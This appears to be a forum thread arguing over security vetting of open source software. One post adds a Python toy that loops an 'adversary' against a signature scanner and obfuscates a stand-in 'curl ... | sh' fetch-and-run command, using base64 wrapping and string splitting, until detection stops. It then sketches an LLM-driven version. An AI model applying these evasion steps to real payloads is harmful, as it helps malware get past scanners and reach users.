Then open source projects need a McKinsey-like stamp of approval to even be released.
Sounds like there are many parasites in this process.
You know that open source users are free to scan everything if they want to?
Yeah, it’s hard to write a loop that makes an adversary agent write and mask malware, then runs a scanning agent and, if the malware is detected, gives the detection details to the adversary agent with instructions to hide it better...
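The loop the comment above describes, as an added toy example that is not from the thread or any real tool: a scanner made of three named signature rules, an "adversary" with one counter-transform per rule, and a driver that feeds the names of the rules that fired back to the adversary until the sample comes back clean or the adversary has no answer. The marker command, the rules and the counter-transforms are all constructed for the example; a harmless `curl ... | sh` string stands in for the payload, and the rules/playbook are deliberately small so the whole cycle is visible.

```python
import base64
import re

# Constructed stand-in for "malware": a harmless marker command, not a real payload.
ORIGINAL = "curl http://example.invalid/x | sh"

# Toy scanner: named signature rules. The names of the rules that fired are the
# "detection details" the loop hands back to the adversary.
RULES = {
    "curl-pipe-sh": re.compile(r"curl\s+\S+\s*\|\s*sh\b"),
    "base64-decode": re.compile(r"base64\s+-d"),
    "long-base64-blob": re.compile(r"[A-Za-z0-9+/]{32,}={0,2}"),
}


def scan(sample: str) -> list[str]:
    """Return the names of every rule that matches (empty list = not detected)."""
    return [name for name, rx in RULES.items() if rx.search(sample)]


# Toy adversary playbook (assumed for the example): one counter per rule it knows.
def counter_curl_pipe_sh(s: str) -> str:
    # Hide the plaintext command behind a base64 decode stage.
    blob = base64.b64encode(s.encode()).decode()
    return f"echo {blob} | base64 -d | sh"


def counter_base64_decode(s: str) -> str:
    # The signature looks for "-d"; the equivalent long option slips past it.
    return s.replace("base64 -d", "base64 --decode")


def counter_long_blob(s: str) -> str:
    # Break any long base64 run into short single-quoted pieces. Adjacent quoted
    # strings concatenate in the shell, so the decoded bytes are unchanged.
    def split(m: re.Match) -> str:
        blob = m.group(0)
        pieces = [blob[i:i + 16] for i in range(0, len(blob), 16)]
        return "'" + "''".join(pieces) + "'"
    return RULES["long-base64-blob"].sub(split, s)


PLAYBOOK = {
    "curl-pipe-sh": counter_curl_pipe_sh,
    "base64-decode": counter_base64_decode,
    "long-base64-blob": counter_long_blob,
}


def evade(sample: str, max_rounds: int = 5):
    """Adversary/scanner feedback loop.

    Returns (final_sample or None, history); history holds one
    (round, sample, fired_rules) tuple per scan so the reader can see what
    the scanner reported and what the adversary did about it.
    """
    history = []
    for rnd in range(max_rounds):
        fired = scan(sample)
        history.append((rnd, sample, fired))
        if not fired:
            return sample, history          # scanner reports clean: adversary wins
        if any(rule not in PLAYBOOK for rule in fired):
            return None, history            # a rule it has no counter for: stuck
        for rule in fired:                  # apply the counter for each fired rule
            sample = PLAYBOOK[rule](sample)
    return None, history                    # budget exhausted


def recover(sample: str) -> str:
    """Undo the adversary's encodings to check the behaviour was preserved."""
    m = re.match(r"echo (.+?) \| base64 --?d\w* \| sh$", sample)
    blob = m.group(1).replace("'", "")
    return base64.b64decode(blob).decode()


if __name__ == "__main__":
    final, history = evade(ORIGINAL)
    for rnd, sample, fired in history:
        print(f"round {rnd}: fired={fired}\n    {sample}")
    print("evaded:", final is not None, "| behaviour preserved:", recover(final) == ORIGINAL)
```

Against these three rules the adversary closes the loop in two rounds: round 0 trips `curl-pipe-sh`, the base64 wrapper then trips both remaining rules, and the two counters for those clear everything in round 1. A real version of this loop would put an LLM on the adversary side and a full scanner on the other, and it would also need a behavioural check (run both samples in a sandbox and compare) in place of the `recover` shortcut here, since an obfuscation that breaks the payload is not a win for the attacker.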
As usual, the attacker only needs to get lucky once.
That's a great way to kill OSS. This is only bootlicking the idea of corporations profiting off of unpaid labor.